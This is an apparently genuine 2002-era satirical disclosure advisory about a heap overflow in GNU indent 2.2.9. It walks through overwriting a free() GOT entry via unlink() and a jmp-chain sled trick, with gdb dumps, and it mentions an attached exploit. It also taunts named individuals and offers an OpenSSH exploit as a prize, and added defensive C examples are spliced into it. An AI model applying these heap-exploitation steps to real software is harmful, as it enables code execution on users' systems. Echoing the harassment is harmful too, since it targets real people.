-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ASCII-art banner]
Software: indent
Version: 2.2.9
Vulnerability: buffer overflow while parsing a .c file
Found date: Aug 2002
Release date: today, you stupid whitehat boy
Researchers: Winnie The Pooh Hacking Squadron
Favourite food: whitehat soup

[0] LICENSE

1) No whitehat whore can use this in his pseudo-security work.
2) divineint can't trade the exploit attached to this advisory on #darknet@efnet or any other lame channel (for people who don't know it yet: his new nick is illumanti(z). Is he hiding?!)
3) Every hacker can implement an exploit for this vuln in his code to protect it from script kiddies and whitehats.
4) WtPHS strongly encourages hackers to use this against whitehats.
5) WtPHS doesn't give a shit if you hurt yourself.

[1] INTRO

indent is a really fucking leet tool that improves the appearance of C source code. It was designed to help people read sources written by damn stupid and unskilled programmers like You Dong-Hun or Theo the Radt. It is really helpful nowadays because of those whores who think they are coders. Unfortunately the authors of indent also made their software vulnerable to a buffer overflow.

[2] DETAILS

handle_token_colon(...) is the vulnerable function. The buffer overflow occurs while parsing text (from the .c file of korz) which indent treats as a label. It copies the whole 'label' into a 1000-byte buffer on the heap without bounds checking. (Note for divineint-alike people: such an overflow can lead to overwriting heap structures and, as a result, arbitrary code execution.)

This is the vulnerable part of the handle_token_colon(...) function:

    for (t_ptr = s_code; *t_ptr; ++t_ptr)
    {
        *e_lab++ = *t_ptr;      /* turn everything so far into a label */
    }

(Note for gorion(*)-alike people: this loop will copy until a NUL byte is found in the source string.)

[3] EXPLOITATION

This section is needed for stupid people like divineint or Lorenzo Hernandez Garcia-Hierro (Good Lord! I feel like I'm in a South American telenovela saying his name).
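As an added example (written for this edit, not code from indent or from this advisory), here is a bounds-checked replacement for the copy loop in [2]. The label_buf struct standing in for indent's labbuf/e_lab pair, the 1000-byte starting size and the demo_label_copy scenario are constructed assumptions; the point is that the cursor e_lab must be rebased once the buffer is grown.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for indent's labbuf/e_lab pair (constructed here). */
struct label_buf {
    char *labbuf;   /* start of the heap buffer */
    char *e_lab;    /* write cursor into labbuf */
    size_t size;    /* current capacity in bytes */
};

/* Bounds-checked replacement for the advisory's copy loop: grows the buffer
 * when label + NUL would not fit, and rebases e_lab because the old cursor
 * dangles once realloc moves the block. Returns -1 on allocation failure. */
static int label_append(struct label_buf *lb, const char *s_code)
{
    size_t used = (size_t)(lb->e_lab - lb->labbuf);
    size_t need = used + strlen(s_code) + 1;
    if (need > lb->size) {
        size_t new_size = lb->size;
        while (new_size < need)
            new_size *= 2;
        char *p = realloc(lb->labbuf, new_size);
        if (p == NULL) return -1;   /* old buffer stays valid and unchanged */
        lb->labbuf = p;
        lb->e_lab = p + used;       /* rebase the cursor into the new block */
        lb->size = new_size;
    }
    for (const char *t_ptr = s_code; *t_ptr; ++t_ptr)
        *lb->e_lab++ = *t_ptr;      /* turn everything so far into a label */
    *lb->e_lab = '\0';
    return 0;
}

/* Constructed scenario: a 1000-byte labbuf (indent 2.2.9's size) receives a
 * label of label_len 'A' bytes. Returns the final capacity, 0 on error. */
size_t demo_label_copy(size_t label_len)
{
    struct label_buf lb = { NULL, NULL, 1000 };
    char *label = malloc(label_len + 1);
    size_t cap = 0;
    lb.labbuf = lb.e_lab = malloc(lb.size);
    if (lb.labbuf != NULL && label != NULL) {
        memset(label, 'A', label_len);
        label[label_len] = '\0';
        if (label_append(&lb, label) == 0 && strlen(lb.labbuf) == label_len)
            cap = lb.size;          /* 1000 when it fits, 2000 for 1500 bytes */
    }
    free(label);
    free(lb.labbuf);
    return cap;
}
```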
Smart people choose the clear_buf_break_list() function to cause code execution. This function is executed right after our vulnerable loop, so we don't risk an application crash. indent breaks source code up and builds a doubly-linked list (buf_break_list) of code parts. The mentioned function free()'s all buf_break_list entries. These doubly-linked list entries are allocated after 'labbuf' (e_lab points into labbuf), so we are able to overwrite them. Now exploitation is very easy: overwrite the free() GOT entry with and make the clear_buf_break_list() loop run once again by setting the 'prev' field of the buf_break_st_ty struct to some readable value.

An exploit for this vulnerability for indent 2.2.9 from Slackware 9.0 is attached to this advisory.

NOTICE!!!! QUIZ FOR KIDDIES:
---------------------------------------------------------------------
This exploit has a simple execve(shell) shellcode. What do you have to change to make this exploit useful?
---------------------------------------------------------------------
FIRST PERSON WHO SENDS US A GOOD ANSWER WINS THE OpenSSH Buffer Management Vulnerability REMOTE EXPLOIT ... DON'T WAIT!! DO IT NOW!

[4] EDUCATIONAL VALUE

What's educational here? One technique used in this exploit. Let's call FD = WHAT and BK = WHERE-8. People with IQ > 75 know that unlink() will do *(WHAT+0xc) = (WHERE-8) as well as *((WHERE-8)+8) = WHAT. If we point WHAT at the NOPs before our shellcode, unlink() will change a few of our NOPs into something else. Executing this 'something else' will probably crash our application.
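As an added example (not from this advisory, from indent or from glibc), the two pointer writes of unlink() on a tampered list node, next to the safe-unlink check that glibc's malloc performs before unlinking a chunk (it aborts with "corrupted double-linked list" when either neighbour does not point back at the node). The node layout, the circular list and the stand-in for the GOT slot are constructed for the example.

```c
#include <stddef.h>

/* Constructed node in the spirit of indent's buf_break_list entries (not its real struct). */
struct node {
    struct node *fd;    /* next entry: FD, "WHAT" in the advisory */
    struct node *bk;    /* previous entry: BK, "WHERE-8" in the advisory */
};

/* Unlink as old allocators did it: two pointer writes that trust whatever
 * fd/bk hold. On a tampered node this is the *(WHAT+0xc) / *(WHERE) pair from [4]. */
static void unlink_unchecked(struct node *p)
{
    struct node *FD = p->fd, *BK = p->bk;
    FD->bk = BK;
    BK->fd = FD;
}

/* Safe unlink (glibc malloc's check, which aborts with "corrupted double-linked
 * list"): both neighbours must still point back at p, else refuse and write nothing. */
static int unlink_checked(struct node *p)
{
    if (p->fd->bk != p || p->bk->fd != p) return -1;
    unlink_unchecked(p);
    return 0;
}

/* Intact circular list a <-> b <-> c: unlinking b passes the check. Returns 1 on success. */
int demo_intact_list(void)
{
    struct node a, b, c;
    a.fd = &b; a.bk = &c;
    b.fd = &c; b.bk = &a;
    c.fd = &a; c.bk = &b;
    if (unlink_checked(&b) != 0) return 0;
    return a.fd == &c && c.bk == &a;
}

/* Node whose fd/bk an overflow rewrote: fd aims at a stand-in for an unrelated word
 * (the GOT slot in [3]), bk at the value to plant there. Returns -1 when the check
 * refuses it with the slot untouched, 1 when the unchecked path wrote both words. */
int demo_tampered_node(int use_check)
{
    struct node slot = { NULL, NULL }, value = { NULL, NULL }, victim;
    victim.fd = &slot;
    victim.bk = &value;
    if (use_check)
        return (unlink_checked(&victim) == -1 && slot.bk == NULL) ? -1 : 0;
    unlink_unchecked(&victim);
    return (slot.bk == &value && value.fd == &slot) ? 1 : 0;
}
```

The same back-pointer check applies to any doubly-linked list whose nodes sit next to an overflowable buffer, such as the buf_break_list entries allocated after labbuf.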
In gdb it looks like this. Before unlink():

    (gdb) x/20i 0x805b440
    0x805b440: nop
    0x805b441: nop
    0x805b442: nop
    0x805b443: nop
    0x805b444: nop
    0x805b445: nop
    0x805b446: nop
    0x805b447: nop
    0x805b448: nop
    0x805b449: nop
    0x805b44a: nop
    0x805b44b: nop
    0x805b44c: nop
    0x805b44d: nop
    0x805b44e: nop
    0x805b44f: nop
    0x805b450: nop
    0x805b451: nop
    0x805b452: nop
    0x805b453: nop
    (gdb) x/x 0x8058dc8
    0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x40019f52

After unlink():

    (gdb) x/x 0x8058dc8
    0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x0805b440
    (gdb) x/20i 0x805b440
    0x805b440: nop
    0x805b441: nop
    0x805b442: nop
    0x805b443: nop
    0x805b444: nop
    0x805b445: nop
    0x805b446: nop
    0x805b447: nop
    0x805b448: nop
    0x805b449: nop
    0x805b44a: nop
    0x805b44b: nop
    0x805b44c: rorb $0x90,0x90900805(%ebp)
    0x805b453: nop
    0x805b454: nop
    0x805b455: nop
    0x805b456: nop
    0x805b457: nop
    0x805b458: nop
    0x805b459: nop

The next call to free() will jump to 0x805b440. If execution flow reaches 0x805b44c, the program will crash at this instruction. The solution is simple; however, WtPHS don't remember anybody describing it before, so ...
here it is: instead of NOPs you can use relative jmps, like this. Before unlink():

    (gdb) x/20i 0x805b440
    0x805b440: jmp 0x805b44a
    0x805b442: jmp 0x805b44c
    0x805b444: jmp 0x805b44e
    0x805b446: jmp 0x805b450
    0x805b448: jmp 0x805b452
    0x805b44a: jmp 0x805b454
    0x805b44c: jmp 0x805b456
    0x805b44e: jmp 0x805b458
    0x805b450: jmp 0x805b45a
    0x805b452: jmp 0x805b45c
    0x805b454: jmp 0x805b45e
    0x805b456: jmp 0x805b460
    0x805b458: jmp 0x805b462
    0x805b45a: jmp 0x805b464
    0x805b45c: jmp 0x805b466
    0x805b45e: jmp 0x805b468
    0x805b460: jmp 0x805b46a
    0x805b462: jmp 0x805b46c
    0x805b464: jmp 0x805b46e
    0x805b466: jmp 0x805b470

After unlink():

    (gdb) x/10i 0x805b440
    0x805b440: jmp 0x805b44a
    0x805b442: jmp 0x805b44c
    0x805b444: jmp 0x805b44e
    0x805b446: jmp 0x805b450
    0x805b448: jmp 0x805b452
    0x805b44a: jmp 0x805b454
    0x805b44c: rorb $0xeb,0x8eb0805(%ebp)
    0x805b453: or %ch,%bl
    0x805b455: or %ch,%bl
    0x805b457: or %ch,%bl
    (gdb) x/10i 0x805b454
    0x805b454: jmp 0x805b45e
    0x805b456: jmp 0x805b460
    0x805b458: jmp 0x805b462
    0x805b45a: jmp 0x805b464
    0x805b45c: jmp 0x805b466
    0x805b45e: jmp 0x805b468
    0x805b460: jmp 0x805b46a
    0x805b462: jmp 0x805b46c
    0x805b464: jmp 0x805b46e
    0x805b466: jmp 0x805b470

This way we jumped over the shitty instruction. These jmps will lead execution flow to our shellcode, but to be sure that no jmp lands in the middle of the shellcode you have to put a few (at least 8) NOPs before the shellcode. Then the last jmp will land in the NOPs and the shellcode will execute properly.

[5] IMPACT

The possible impact is quite big. For example, companies and software developers that are terrified because their software is damn shitty (Cisco, Apache, OpenBSD, Linux kernel first come to our mind) could implement an exploit for this vuln in their source code to make hackers' lives difficult.

[6] FLAMES, SHOUTOUTS and FINAL NOTES

*) no, divineint, you can't get our juarez - stop begging for it, biatch
*) no, Stefan Esser, you can't steal our juarez and publish it as your own, because you are too stupid to own us.
*) shoutouts to our brotherly squad - Mickey Mouse Hacking Squadron
*) shoutouts to PHC for terrorizing whitehats and full-disclosure
*) the recent OpenSSH vulnerability is exploitable
*) greetings to Lorenzo Hernandez Garcia-Hierro for making us laugh on the floor while reading his posts.
*) kudos to Alan Alexander Milne (R.I.P - 1956)

[7] OUTRO

the end...

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.3

wkYEARECAAYFAj/sM6EACgkQYE4zNxPdkhNhpACfc5C40UAJ7K8ybtvg6o6uXUzhoR0A
oI+4wR01MMKbGwVqDdpjIxXRrzX7
=eC7E
-----END PGP SIGNATURE-----
Attachment:
WinnieThePooh-indent-2.2.9-0day.tar.bz2
Description: BZip2 compressed data
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.3

wkYEABECAAYFAj/sM4cACgkQYE4zNxPdkhP/ogCfaYX9aIYezUeFOqjBszPUseYLi1EA
ni8k2tyESGb/cZFrLYKYEXlKFZG4
=LiET
-----END PGP SIGNATURE-----